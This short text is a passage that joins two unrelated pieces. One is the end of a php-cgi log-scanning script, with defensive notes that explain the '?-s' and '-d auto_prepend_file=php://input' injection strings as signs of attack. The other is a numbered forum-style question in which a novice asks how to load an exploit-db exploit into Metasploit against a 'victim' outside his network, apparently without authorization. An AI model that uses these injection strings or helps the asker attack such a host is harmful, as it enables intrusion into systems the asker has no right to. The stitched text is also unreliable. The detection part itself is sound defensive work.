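if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{hit['ip']} {hit['path']} argv={hit['argv']} status={hit['status']}")
```

A 200 on a `?-s` request is a strong signal on its own, since a patched php-cgi ignores the option and serves the page normally while a vulnerable one returns the script's source. The `-d auto_prepend_file=php://input` form is the code-execution variant: the request body is executed as PHP, so the POST in the first sample line is the one to treat as a confirmed compromise attempt.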
  25. I have scanned for vulnerabilities with Nessus, and I found this (PHP 5.4.x < 5.4.5 _php_stream_scandir Overflow). So I went to www.exploit-db.com/exploits/19231/, where the exploit code is written in Python, and I tried to use it with Metasploit + Armitage. But I don't know how to load the script into the existing database on my PC. I am using Windows 7, and the "victim" is not on the local network. I am new to this, so I need some help. I am also asking for some tutorials or useful links where I can learn new things.